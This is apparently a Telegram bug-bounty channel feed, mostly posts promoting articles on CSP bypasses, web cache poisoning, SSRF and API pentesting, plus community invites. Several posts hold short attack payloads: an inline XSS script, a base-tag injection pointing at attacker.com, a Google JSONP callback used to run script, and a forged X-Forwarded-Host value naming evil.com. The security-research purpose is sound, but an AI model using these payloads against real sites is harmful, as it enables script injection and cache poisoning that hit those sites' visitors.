Bug Bounty
10.4K subscribers
369 photos
3 videos
46 files
426 links
Bugbounty Resources • Tips • Security Zines • Writeups • Vulnerability Update • Notes • Mindmaps • Cheatsheets • Checklists • Article / Blogs • PDFs • ebooks •
Download Telegram
Tired of hunting the same old OWASP Top 10? The real gold is often found in business logic flaws – where processes, not just code, are vulnerable.

Learn how to systematically uncover these high-impact bugs that scanners overlook.

New article out now! 👇
https://medium.com/@Aacle/yond-the-owasp-top-10-a-strategic-guide-to-uncovering-high-impact-business-logic-flaws-b221729fb655
🥰42
Dear Hunters,
To allow for more focused conversations and make it easier to share resources, we're launching the official Vulncure WhatsApp Community.

This will be our central hub for deeper collaboration, designed with a clear structure to help you find the information you need without the noise.

Inside, you'll find dedicated groups:

💬 #infosec Talks
For discussing industry news, trends, and general cybersecurity topics.

🎯 #bugbounty tips
A dedicated space to share methodologies, ask for technical advice, and post your best tips.

🛡 #vulncure Security
For direct updates from our team, questions about our projects, and first-hand info.

We'll continue to add more groups based on your feedback. The goal is to build a powerful resource for all of us to connect, learn, and grow.

Ready to join a more organized space?

👉 Click here to join the Vulncure WhatsApp Community:
https://chat.whatsapp.com/G5BJG25IfrDA296gsPGwaU
9
That CSP error in your console? It's not a wall—it's an invitation.

I just published Part 1 of my CSP Bypass series: the fundamentals that work on 70-80% of policies.

5 quick wins that still pay bounties 🧵👇

1️⃣ 'unsafe-inline' = instant win
2️⃣ Wildcard domains = JSONP paradise
3️⃣ File uploads to CDNs = code execution
4️⃣ Missing base-uri = hijack all scripts
5️⃣ Missing object-src = embed attacks

Each one has gotten ~$2,500-$5,000 payouts.

2. example:
Policy: script-src 'self' cdn.example.com

I uploaded a .js file as a profile picture → got the CDN URL → loaded it as a script.

$3,000 bounty from a "secure" CSP.
The key? Attack the TRUSTED domains, not the policy itself.

3. My CSP audit checklist:

✓ Read full policy
✓ Hunt for JSONP on whitelisted domains
✓ Test file uploads
✓ Check base-uri
✓ Check object-src
✓ Look for unsafe-inline/eval

One hit from this list = potential critical XSS.

This is just the beginning.

Part 2: Advanced nonce exploitation, AngularJS escapes, service workers

Part 3: DOM clobbering, mutation XSS, scriptless attacks

Full guide + testing checklist:
https://medium.com/@Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699
👍2🔥1
5
First, understand this :
Content Security Policy = No XSS
It just means "XSS with extra steps"

🟩 : 70% of CSPs I encounter have misconfigurations that make them completely useless. #bugbounty #infosec

Here are the 👇 5 deadly mistakes developers make:

𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟭: '𝘂𝗻𝘀𝗮𝗳𝗲-𝗶𝗻𝗹𝗶𝗻𝗲'

If you see this in script-src, you've already won.
Policy: script-src 'self' 'unsafe-inline'

Bypass: <script>alert(1)</script>
It literally allows ALL inline scripts.

𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟮: 𝗪𝗶𝗹𝗱𝗰𝗮𝗿𝗱 𝗗𝗼𝗺𝗮𝗶𝗻𝘀 (*.𝗴𝗼𝗼𝗴𝗹𝗲.𝗰𝗼𝗺)
"It's Google, what could go wrong?"

Everything.

This JSONP endpoint on Google works on tons of apps: http://
accounts.google.com/o/oauth2/revoke?callback=alert

𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟯: 𝗠𝗶𝘀𝘀𝗶𝗻𝗴 𝗯𝗮𝘀𝗲-𝘂𝗿𝗶
This is my favorite because it's ALWAYS overlooked.
Inject: <base href="https://attacker.com">

Now ALL relative script paths load from your domain.

𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟰: 𝗙𝗶𝗹𝗲 𝗨𝗽𝗹𝗼𝗮𝗱𝘀 𝗼𝗻 𝗪𝗵𝗶𝘁𝗲𝗹𝗶𝘀𝘁𝗲𝗱 𝗗𝗼𝗺𝗮𝗶𝗻𝘀
Policy: script-src 'self' http://cdn.example.com

If you can upload files to that CDN → game over.
upload a .js file disguised as a profile picture. Direct S3 URL. Loaded as script.

𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟱: 𝗧𝗿𝘂𝘀𝘁𝗶𝗻𝗴 𝗖𝗗𝗡𝘀 𝘄𝗶𝘁𝗵 𝗢𝗹𝗱 𝗟𝗶𝗯𝗿𝗮𝗿𝗶𝗲𝘀

AngularJS versions < 1.6.0 have sandbox escapes.
If a whitelisted domain hosts old Angular → you can execute code.

Check http://ajax.googleapis.com for old versions. This works more often than you'd think.

𝗧𝗵𝗶𝘀 𝗶𝘀 𝗷𝘂𝘀𝘁 𝘁𝗵𝗲 𝗯𝗲𝗴𝗶𝗻𝗻𝗶𝗻𝗴.

𝗣𝗮𝗿𝘁 𝟮: Advanced nonce exploitation, AngularJS escapes, service workers
𝗣𝗮𝗿𝘁 𝟯: DOM clobbering, mutation XSS, scriptless attacks

𝗙𝘂𝗹𝗹 𝗴𝘂𝗶𝗱𝗲 + 𝘁𝗲𝘀𝘁𝗶𝗻𝗴 𝗰𝗵𝗲𝗰𝗸𝗹𝗶𝘀𝘁:
https://medium.com/@Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699
🥰62
Golden checklist for every beginner out there 👇 by Godfather Orwa

1 spend 1-2 hours understanding burp & burp extensions

2 spend 1-2 day understanding subdomain enumeration with more than 1 tool

3 don’t forget scanning port all the time
4 use waymore tool to extract endpoint from lot of resources

5 keep ai chat is opening and ask anything anytime

6 autorized & JS miner is so important extensions read about it and use it
14
Web Cache Poisoning Tips

Attacker mindset — don’t bruteforce: look for what the cache keys include. Host headers, cookies, query strings, Accept headers, and odd edge-case headers often end up in the key.

Make the app include your input in the key → you control cached output.

Read Full Article : https://medium.com/@Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48
2
🔥 SSRF hunters — 3 tiny tricks that turn “maybe” into provable (one-request) POCs — read the full playbook👇

⏱️ Timing-delay
🔁 Subdomain-rotation
🏷️ Header-correlation

Read the full Medium guide ➡️ https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015
🔥2
Part - 2
Web Cache Poisoning

Quick tip: test X-Forwarded-Host + extension flips (.css/.js) — if the edge caches your reflected header or JSON as a “static” asset, every visitor can get poisoned JS or tokens.

Read 5 practical PoCs & seeding recipes →
https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a
1
Web Cache Poisoning
small checklist

Read Full Article : https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a

• Test X-Forwarded-*, X-Host, X-Original-URL, User-Agent for reflection.

• Check Vary and target UA-specific poisoning when relevant.

• Try encoded dot-segments (%2e%2e, %2f, %5c) and observe X-Cache

• Test .css / .js extension flip on sensitive endpoints (CSPT)

• Seed cache via Burp parallel requests (first .js then main HTML)

• Use fresh IPs, low request rate, and record X-Cache, Age, CF-Cache-Status

• Run delimiter discovery (append random suffix → insert delimiter → compare).
9👍3🔥1
New bug bounty resource 🚀

The Cache Poisoning Bible - Part 1: Advanced Fundamentals

Everything I wish I knew when I started:

• Cache key architectures
• CDN comparison guide
• Advanced detection methods
• Real-world patterns

https://medium.com/@Aacle/the-cache-poisoning-bible-part-1-advanced-fundamentals-2c8e9d7be2e9
👍43
CACHE POISONING QUICK WIN:

Most apps validate X-Forwarded-Host as a single value.
But try this:

X-Forwarded-Host: http://legit.com, http://evil.com

• CDN: Reads first → Allows
• App: Reads last → Injects
🔥9
🛡 Bug Hunters — Let’s Team Up!

For years we’ve all been testing bypasses alone… comparing notes in DMs… sharing half-cooked payloads in random chats. It’s time to fix that.

I’ve created a dedicated ChatGPT Group where bug hunters can finally work together in one shared space — from discussing tricky bypasses to crafting better PoCs and reports.

If you enjoy:
• Testing bypasses together
• Collaborating on payload ideas
• Fast back-and-forth debugging
• Helping each other write clean, solid bug reports
• And generally leveling up your security skills

…then you’ll feel right at home.

👉 Join the Bug Hunter Collab Group:
https://chatgpt.com/gg/v/692011ee91a481a1b4bdd62f4ea6b908?token=Oig20pz7p5pRlcUpitZ6oA

Let’s bring the community energy back into bug hunting — one payload at a time. 🔥
14🤣3
API Pentesting Series — Part 7

Before you attack APIs, you need a solid lab.
This part covers:
• Tooling (Burp, DevTools, Postman)
• Discovery tools (Kiterunner, Nikto)
• Docker-based vulnerable APIs
• Full environment setup

Notion Notes 🔗: https://notion.so/aacle/PART-7-API-PenTesting-Series-LAB-SETUP-2b9f7b9ea30e809f8e8ddc938eb0fb1a
9
I just wanted to share my writeup about one click ATO with you:

https://blog.mirzadzare.net/from-log-in-with-oauth-to-your-account-is-mine-desktop-app-edition

Hope you enjoy it
7👍2